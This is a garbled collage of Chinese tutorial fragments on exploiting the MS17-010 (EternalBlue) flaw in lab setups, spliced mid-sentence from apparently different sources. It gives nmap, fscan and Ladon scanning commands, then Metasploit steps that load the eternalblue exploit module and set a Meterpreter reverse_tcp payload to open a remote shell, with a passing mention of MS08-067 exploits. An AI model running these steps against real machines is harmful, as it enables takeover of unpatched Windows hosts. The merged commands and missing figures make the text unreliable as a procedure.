得到,靶机IPnmap-sP192.168.229.0/24得到:IP:192.168.229.169然后利用:nmapscript=vuln192.168.229.169得到靶机信息:发现可能利用的漏洞:ms17-010然后启动msfmsLadon.exe 192.168.0.28 MS17010 fscanfscan -h 192.168.0.28 3 MS17-010漏洞利用方式有防火墙https://bilibili/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=
MSF常规漏洞利用msf > use exploit/windows/smb/ms17_010_eternalblue 目标出网时反向打:msf >setpayload windows/x64/meterpreter/reverse_tcp 目标不出网查找MS17-010 漏洞利用模块,如图1 图1 使用ms17-010 攻击模块,查看相应的Payloads,如图2、3 所示。图2 图3 选择并设置set payload windows/x64/meterpreter/reverse_tcp 攻击
MS17010(永恒之蓝漏洞利用) 目标鸡:192.168.75.136(Windows 2008 R2) 攻击鸡:192.168.75.130(Kali) 注:ms17_010_eternalblue只能对windows 7 64位和windows 2008 R2 64位攻击首先使用nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局域网的意
后期看雪论坛有人放出了MS08-067的适用于中文系统exp,还有很详细的分析文章,但那是好多年后的事情了,那个exp我后来也测试过,能打成功,但是也不太稳定。当时还没有NSA的方程式工具包1、使用ipconfig/ifconfig分别查看win7和kali的ip。2、打开msf工具每次开启都会有不同的界面3、使用search命令搜索ms17_010 4、选择模块和设置条件使用use来选择第三个模块,可
